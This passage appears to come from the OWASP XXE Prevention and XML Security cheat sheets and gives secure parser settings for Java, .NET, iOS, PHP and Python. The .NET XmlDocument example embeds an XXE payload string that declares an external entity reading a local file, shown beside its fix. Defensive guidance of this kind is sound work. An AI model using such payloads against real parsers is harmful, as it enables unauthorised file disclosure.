import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {\n// This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all\n// XML entity attacks are prevented\n// Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl\nFEATURE = \"http://apache.org/xml/features/disallow-doctype-decl\";\ndbf.setFeature(FEATURE, true);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

If you can't completely disable DTDs:

import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {    // If you can't completely disable DTDs, then at least do the following:\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities\n// JDK7+ - http://xml.org/sax/features/external-general-entities\n//This feature has to be used together with the following one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-general-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities\n// JDK7+ - http://xml.org/sax/features/external-parameter-entities\n//This feature has to be used together with the previous one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-parameter-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Disable external DTDs as well\nFEATURE = \"http://apache.org/xml/features/nonvalidating/load-external-dtd\";\ndbf.setFeature(FEATURE, false);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\ndbf.setExpandEntityReferences(false);\n\n// As stated in the documentation \"Feature for Secure Processing (FSP)\" is the central mechanism to \n// help safeguard XML processing. It instructs XML processors, such as parsers, validators, \n// and transformers, to try and process XML securely. This can be used as an alternative to\n// dbf.setExpandEntityReferences(false); to allow some safe level of Entity Expansion\n// Exists from JDK6.\ndbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\n\n\n// And, per Timothy Morgan: \"If for some reason support for inline DOCTYPEs are a requirement, then\n// ensure the entity settings are disabled (as shown above) and beware that SSRF attacks\n// (http://cwe.mitre.org/data/definitions/918.html) and denial\n// of service attacks (such as billion laughs or decompression bombs via \"jar:\") are a risk.\"\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is probably not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

Xerces 1 Features:

Xerces 2 Features:

Note: The above defenses require Java 7 update 67, Java 8 update 20, or above, because the above countermeasures for DocumentBuilderFactory and SAXParserFactory are broken in earlier Java versions, per: CVE-2014-6517.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory-a-stax-parser","title":"XMLInputFactory (a StAX parser)","text":"

StAX parsers such as XMLInputFactory allow various properties and features to be set.

To protect a Java XMLInputFactory from XXE, disable DTDs (doctypes) altogether:

// This disables DTDs entirely for that factory\nxmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);\n

or if you can't completely disable DTDs:

// This causes XMLStreamException to be thrown if external DTDs are accessed.\nxmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\n// disable external entities\nxmlInputFactory.setProperty(\"javax.xml.stream.isSupportingExternalEntities\", false);\n

The setting xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\"); is not required, as XMLInputFactory is dependent on Validator to perform XML validation against Schemas. Check the Validator section for the specific configuration.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#oracle-dom-parser","title":"Oracle DOM Parser","text":"

Follow the Oracle recommendation, e.g.:

    // Extend oracle.xml.parser.v2.XMLParser\nDOMParser domParser = new DOMParser();\n\n// Do not expand entity references\ndomParser.setAttribute(DOMParser.EXPAND_ENTITYREF, false);\n\n// dtdObj is an instance of oracle.xml.parser.v2.DTD\ndomParser.setAttribute(DOMParser.DTD_OBJECT, dtdObj);\n\n// Do not allow more than 11 levels of entity expansion\ndomParser.setAttribute(DOMParser.ENTITY_EXPANSION_DEPTH, 12);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory","title":"TransformerFactory","text":"

To protect a javax.xml.transform.TransformerFactory from XXE, do this:

TransformerFactory tf = TransformerFactory.newInstance();\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator","title":"Validator","text":"

To protect a javax.xml.validation.Validator from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nSchema schema = factory.newSchema();\nValidator validator = schema.newValidator();\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#schemafactory","title":"SchemaFactory","text":"

To protect a javax.xml.validation.SchemaFactory from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nSchema schema = factory.newSchema(Source);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxtransformerfactory","title":"SAXTransformerFactory","text":"

To protect a javax.xml.transform.sax.SAXTransformerFactory from XXE, do this:

SAXTransformerFactory sf = SAXTransformerFactory.newInstance();\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\nsf.newXMLFilter(Source);\n

Note: Use of the following XMLConstants requires JAXP 1.5, which was added to Java in 7u40 and Java 8:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader","title":"XMLReader","text":"

To protect a Java org.xml.sax.XMLReader from XXE, do this:

XMLReader reader = XMLReaderFactory.createXMLReader();\nreader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.\nreader.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader","title":"SAXReader","text":"

To protect a Java org.dom4j.io.SAXReader from XXE, do this:

saxReader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n

Based on testing, if you are missing one of these, you can still be vulnerable to an XXE attack.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder","title":"SAXBuilder","text":"

To protect a Java org.jdom2.input.SAXBuilder from XXE, disallow DTDs (doctypes) entirely:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\",true);\nDocument doc = builder.build(new File(fileName));\n

Alternatively, if DTDs can't be completely disabled, disable external entities and entity expansion:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nbuilder.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nbuilder.setExpandEntities(false);\nDocument doc = builder.build(new File(fileName));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#no-op-entityresolver","title":"No-op EntityResolver","text":"

For APIs that take an EntityResolver, you can neutralize an XML parser's ability to resolve entities by supplying a no-op implementation:

public final class NoOpEntityResolver implements EntityResolver {\npublic InputSource resolveEntity(String publicId, String systemId) {\nreturn new InputSource(new StringReader(\"\"));\n}\n}\n\n// ...\n\nxmlReader.setEntityResolver(new NoOpEntityResolver());\ndocumentBuilder.setEntityResolver(new NoOpEntityResolver());\n

or more simply:

EntityResolver noop = (publicId, systemId) -> new InputSource(new StringReader(\"\"));\nxmlReader.setEntityResolver(noop);\ndocumentBuilder.setEntityResolver(noop);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxb-unmarshaller","title":"JAXB Unmarshaller","text":"

Since a javax.xml.bind.Unmarshaller parses XML and does not support any flags for disabling XXE, it's imperative to parse the untrusted XML through a configurable secure parser first, generate a source object as a result, and pass the source object to the Unmarshaller. For example:

SAXParserFactory spf = SAXParserFactory.newInstance();\n\n//Option 1: This is the PRIMARY defense against XXE\nspf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Option 2: If disabling doctypes is not possible\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Do unmarshall operation\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),\nnew InputSource(new StringReader(xml)));\nJAXBContext jc = JAXBContext.newInstance(Object.class);\nUnmarshaller um = jc.createUnmarshaller();\num.unmarshal(xmlSource);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression","title":"XPathExpression","text":"

A javax.xml.xpath.XPathExpression cannot be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first.

For example:

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nDocumentBuilder builder = df.newDocumentBuilder();\n\n// Evaluate the XPath expression (\"/some/xpath\" is a placeholder) against the\n// document produced by the securely configured parser\nXPath xpath = XPathFactory.newInstance().newXPath();\nString result = xpath.evaluate(\"/some/xpath\",\nbuilder.parse(new ByteArrayInputStream(xml.getBytes())));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#javabeansxmldecoder","title":"java.beans.XMLDecoder","text":"

The readObject() method in this class is fundamentally unsafe.

Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and execute arbitrary code as described here.

And there is no way to make use of this class safe except to trust or properly validate the input being passed into it.

As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#other-xml-parsers","title":"Other XML Parsers","text":"

There are many third-party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions, like in the examples given above. If there's no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to the insecure third-party parser, similar to how the Unmarshaller is secured.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#spring-framework-mvcoxm-xxe-vulnerabilities","title":"Spring Framework MVC/OXM XXE Vulnerabilities","text":"

For example, some XXE vulnerabilities were found in Spring OXM and Spring MVC. The following versions of the Spring Framework are vulnerable to XXE:

There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.

For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE.

Here's what they say:

Two situations developers must handle:

The issue Spring fixed:

For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.

Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:

import org.springframework.oxm.jaxb.Jaxb2Marshaller;\nimport javax.xml.transform.stream.StreamSource;\nimport java.io.StringReader;\n\nJaxb2Marshaller marshaller = new Jaxb2Marshaller();\n// Must cast return Object to whatever type you are unmarshalling\nmarshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML)));\n

So, per the Spring OXM CVE writeup, the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#castor","title":"Castor","text":"

Castor is a data binding framework for Java. It allows conversion between Java objects, XML, and relational tables. The XML features in Castor prior to version 1.3.3 are vulnerable to XXE and should be upgraded to the latest version. For additional information, check the official XML configuration file.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net","title":".NET","text":"

The following up-to-date information for XXE injection in .NET comes directly from this web application of unit tests by Dean Fleming. This web application covers all currently supported .NET XML parsers and has test cases for each, demonstrating when they are safe from XXE injection and when they are not; however, the tests only cover injection from file, not direct DTD (used by DoS attacks).

For DoS attacks using a direct DTD (such as the Billion laughs attack), a separate testing application from Josh Grossman at Bounce Security has been created to verify that .NET >=4.5.2 is safe from these attacks.

Previously, this information was based on some older articles which may not be 100% accurate including:

The following table lists all supported .NET XML parsers and their default safety levels. Note that in .NET Framework \u22654.5.2, in all cases, if a DoS attempt is performed, an exception is thrown because the expanded XML exceeds the allowed number of characters.

Table explanation:

| Attack Type | .NET Framework Version | XDocument (Linq to XML) | XmlDictionaryReader | XmlDocument | XmlNodeReader | XmlReader | XmlTextReader | XPathNavigator | XslCompiledTransform |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| External entity Attacks | <4.5.2 | \u2705 | \u2705 | \u274c | \u2705 | \u2705 | \u274c | \u274c | \u2705 |
| External entity Attacks | \u22654.5.2 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 |
| Billion Laughs | <4.5.2 | \u2753 | \u2705 | \u274c | \u2705 | \u2705 | \u274c | \u274c | \u2705 |
| Billion Laughs | \u22654.5.2 | \u2705 | \u2705* | \u2705 | \u2705* | \u2705* | \u2705 | \u2705 | \u2705 |

* For .NET Framework Versions \u22654.5.2, these libraries won't even process the in-line DTD by default. Even if you change the default to allow processing a DTD, if a DoS attempt is performed an exception will still be thrown as documented above.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#linq-to-xml","title":"LINQ to XML","text":"

Both the XElement and XDocument objects in the System.Xml.Linq library are safe from XXE injection from external files and from DoS attacks by default. XElement parses only the elements within the XML file, so DTDs are ignored altogether. XDocument has its XmlResolver disabled by default, so it's safe from SSRF. Whilst DTDs are enabled by default, from Framework versions \u22654.5.2 it is not vulnerable to DoS as noted, but it may be vulnerable in earlier Framework versions. For more information, see Microsoft's guidance on how to prevent XXE and XML Denial of Service in .NET.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldictionaryreader","title":"XmlDictionaryReader","text":"

System.Xml.XmlDictionaryReader is safe by default, as when it attempts to parse the DTD, the compiler throws an exception saying that \"CData elements not valid at top level of an XML document\". It becomes unsafe if constructed with a different unsafe XML parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldocument","title":"XmlDocument","text":"

Prior to .NET Framework version 4.5.2, System.Xml.XmlDocument is unsafe by default. The XmlDocument object has an XmlResolver object within it that needs to be set to null in versions prior to 4.5.2. In versions 4.5.2 and up, this XmlResolver is set to null by default.

The following example shows how it is made safe:

 static void LoadXML()\n{\nstring xxePayload = \"<!DOCTYPE doc [<!ENTITY win SYSTEM 'file:///C:/Users/testdata2.txt'>]>\"\n+ \"<doc>&win;</doc>\";\nstring xml = \"<?xml version='1.0' ?>\" + xxePayload;\n\nXmlDocument xmlDoc = new XmlDocument();\n// Setting this to NULL disables DTDs - It's NOT null by default.\nxmlDoc.XmlResolver = null;\nxmlDoc.LoadXml(xml);\nConsole.WriteLine(xmlDoc.InnerText);\nConsole.ReadLine();\n}\n

For .NET Framework version \u22654.5.2, this is safe by default.

XmlDocument can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlnodereader","title":"XmlNodeReader","text":"

System.Xml.XmlNodeReader objects are safe by default and will ignore DTDs even when constructed with an unsafe parser or wrapped in another unsafe parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_1","title":"XmlReader","text":"

System.Xml.XmlReader objects are safe by default.

By default, their ProhibitDtd property is set to true in .NET Framework versions prior to 4.0, and their DtdProcessing property is set to Prohibit in .NET versions 4.0 and later.

Additionally, in .NET versions 4.5.2 and later, the XmlReaderSettings belonging to the XmlReader has its XmlResolver set to null by default, which provides an additional layer of safety.

Therefore, XmlReader objects will only become unsafe in version 4.5.2 and up if both the DtdProcessing property is set to Parse and the XmlReaderSetting's XmlResolver is set to a nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmltextreader","title":"XmlTextReader","text":"

System.Xml.XmlTextReader is unsafe by default in .NET Framework versions prior to 4.5.2. Here is how to make it safe in various .NET versions:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#prior-to-net-40","title":"Prior to .NET 4.0","text":"

In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader objects like XmlTextReader are controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes.

Set these values to true to disable inline DTDs completely.

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is FALSE!!\nreader.ProhibitDtd = true;  
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-40-net-452","title":".NET 4.0 - .NET 4.5.2","text":"

In .NET Framework version 4.0, DTD parsing behavior has been changed. The ProhibitDtd property has been deprecated in favor of the new DtdProcessing property.

However, they didn't change the default settings so XmlTextReader is still vulnerable to XXE by default.

Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a <!DOCTYPE> element is present in the XML.

To set this value yourself, it looks like this:

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is Parse!!\nreader.DtdProcessing = DtdProcessing.Prohibit;  

Alternatively, you can set the DtdProcessing property to Ignore, which will not throw an exception on encountering a <!DOCTYPE> element but will simply skip over it and not process it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-452-and-later","title":".NET 4.5.2 and later","text":"

In .NET Framework versions 4.5.2 and up, XmlTextReader's internal XmlResolver is set to null by default, making the XmlTextReader ignore DTDs by default. The XmlTextReader can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathnavigator","title":"XPathNavigator","text":"

System.Xml.XPath.XPathNavigator is unsafe by default in .NET Framework versions prior to 4.5.2.

This is because it operates on IXPathNavigable objects like XmlDocument, which are also unsafe by default in versions prior to 4.5.2.

You can make XPathNavigator safe by giving it a safe parser like XmlReader (which is safe by default) in the XPathDocument's constructor.

Here is an example:

XmlReader reader = XmlReader.Create(\"example.xml\");\nXPathDocument doc = new XPathDocument(reader);\nXPathNavigator nav = doc.CreateNavigator();\nstring xml = nav.InnerXml.ToString();\n

For .NET Framework version \u22654.5.2, XPathNavigator is safe by default.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xslcompiledtransform","title":"XslCompiledTransform","text":"

System.Xml.Xsl.XslCompiledTransform (an XML transformer) is safe by default as long as the parser it's given is safe.

It is safe by default because the default parser of the Transform() methods is an XmlReader, which is safe by default (per above).

The source code for this method is here.

Some of the Transform() methods accept an XmlReader or IXPathNavigable (e.g., XmlDocument) as an input, and if you pass in an unsafe XML Parser then the Transform will also be unsafe.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#ios","title":"iOS","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2_1","title":"libxml2","text":"

iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly.

However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#nsxmldocument","title":"NSXMLDocument","text":"

iOS also provides an NSXMLDocument type, which is built on top of libxml2.

However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly.

Per the 'NSXMLDocument External Entity Restriction API' section of this page:

However, to completely disable XXE in an NSXMLDocument in any version of iOS you simply specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#php","title":"PHP","text":"

When using the default XML parser (based on libxml2), PHP 8.0 and newer prevent XXE by default.

For PHP versions prior to 8.0, per the PHP documentation, the following should be set when using the default PHP XML parser in order to prevent XXE:

libxml_set_external_entity_loader(null);\n

A description of how to abuse this in PHP is presented in a good SensePost article describing a cool PHP based XXE vulnerability that was fixed in Facebook.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python","title":"Python","text":"

The Python 3 official documentation contains a section on XML vulnerabilities. As of 1 January 2020, Python 2 is no longer supported; however, the Python website still contains some legacy documentation.

The following table gives an overview of various modules in Python 3 used for XML parsing and whether or not they are vulnerable.

| Attack Type | sax | etree | minidom | pulldom | xmlrpc |
| --- | --- | --- | --- | --- | --- |
| Billion Laughs | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable |
| Quadratic Blowup | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable |
| External Entity Expansion | Safe | Safe | Safe | Safe | Safe |
| DTD Retrieval | Safe | Safe | Safe | Safe | Safe |
| Decompression Bomb | Safe | Safe | Safe | Safe | Vulnerable |

To protect your application from the applicable attacks, two packages exist to help you sanitize your input and protect your application against DDoS and remote attacks.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java_1","title":"Java","text":"

Below are the rules for different XML parsers in Java:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#digester","title":"Digester","text":"

Identifying XXE vulnerability in the org.apache.commons.digester3.Digester library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-Digester

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#documentbuilderfactory","title":"DocumentBuilderFactory","text":"

Identifies XXE vulnerabilities in the javax.xml.parsers.DocumentBuilderFactory library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-dbf

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder_1","title":"SAXBuilder","text":"

Identifies XXE vulnerabilities in the org.jdom2.input.SAXBuilder library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-saxbuilder

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxparserfactory","title":"SAXParserFactory","text":"

Identifies XXE vulnerabilities in the javax.xml.parsers.SAXParserFactory library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader_1","title":"SAXReader","text":"

Identifies XXE vulnerabilities in the org.dom4j.io.SAXReader library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-SAXReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory","title":"XMLInputFactory","text":"

Identifies XXE vulnerabilities in the javax.xml.stream.XMLInputFactory library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_2","title":"XMLReader","text":"

Identifies XXE vulnerabilities in the org.xml.sax.XMLReader library. The rule can be tried in the Semgrep playground: https://semgrep.dev/s/salecharohit:xxe-XMLReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html","title":"XML Security Cheat Sheet","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server-side request forgery, port scanning, or brute forcing. This cheat sheet exposes how these different possibilities can be exploited in libraries and software, divided into two sections: Malformed XML Documents and Invalid XML Documents.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-xml-documents","title":"Malformed XML Documents","text":"

The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.

The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute so that only valid values within predefined boundaries are processed.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#more-time-required","title":"More Time Required","text":"

A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS).

To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.
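As a rough illustration of that comparison (a minimal sketch, not taken from the cheat sheet; the sample strings and class name are illustrative), the following Java snippet times the default JAXP DOM parser on a well-formed document and on a malformed variant of the same document:

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

public class ParseTiming {

    // Returns the elapsed parse time in nanoseconds; malformed input is expected to fail.
    static long timeParse(String xml) {
        long start = System.nanoTime();
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (Exception e) {
            // A fatal error on the malformed document is expected; only the elapsed time matters here.
        }
        return System.nanoTime() - start;
    }

    public static void main(String[] args) {
        String wellFormed = "<root><item>value</item></root>";
        String malformed  = "<root><item>value</item>";   // missing closing tag
        System.out.println("well-formed: " + timeParse(wellFormed) + " ns");
        System.out.println("malformed:   " + timeParse(malformed) + " ns");
    }
}

Repeating the measurement with realistic documents from the application gives a better sense of whether malformed input is disproportionately expensive to reject.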

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#applications-processing-malformed-data","title":"Applications Processing Malformed Data","text":"

